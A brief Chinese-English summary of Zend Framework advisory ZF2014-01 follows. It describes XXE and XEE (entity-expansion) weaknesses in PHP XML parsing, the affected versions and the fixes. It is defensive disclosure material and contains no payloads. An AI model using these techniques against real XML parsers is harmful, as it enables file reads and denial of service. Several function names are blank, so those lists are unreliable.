关键漏洞信息 漏洞描述 漏洞编号: ZF2014-01 漏洞类型: Potential XXE/XEE attacks 影响的函数: , , 受影响的组件: Multiple components using PHP's , , and are vulnerable. 攻击类型 XML eXternal Entity (XXE) Injection: - 描述: Insecure by default, allowing external entities to be specified by adding a specific DOCTYPE element to XML documents and strings. This can open arbitrary files and/or TCP connections. XML Entity Expansion (XEE): - 描述: Leads to Denial of Service (DoS) vectors when the XML DOCTYPE declaration includes XML entity definitions that contain recursive or circular references. 采取的措施 扩展补丁: Extended to all usage of the PHP functions mentioned to prevent XXE and XEE attacks. 新组件: Provided and to scan and load XML documents safely. 措施: Used and checked for ENTITY elements in the document type declaration. 影响版本 Zend Framework 1: 1.12.4 Zend Framework 2: 2.1.6 and 2.2.6 Various Zend libraries: 2.0.2 versions 其他信息 参考资料: Links to more information about XXE and XEE attacks. 致谢: Acknowledgments for reporting and fixing the issues.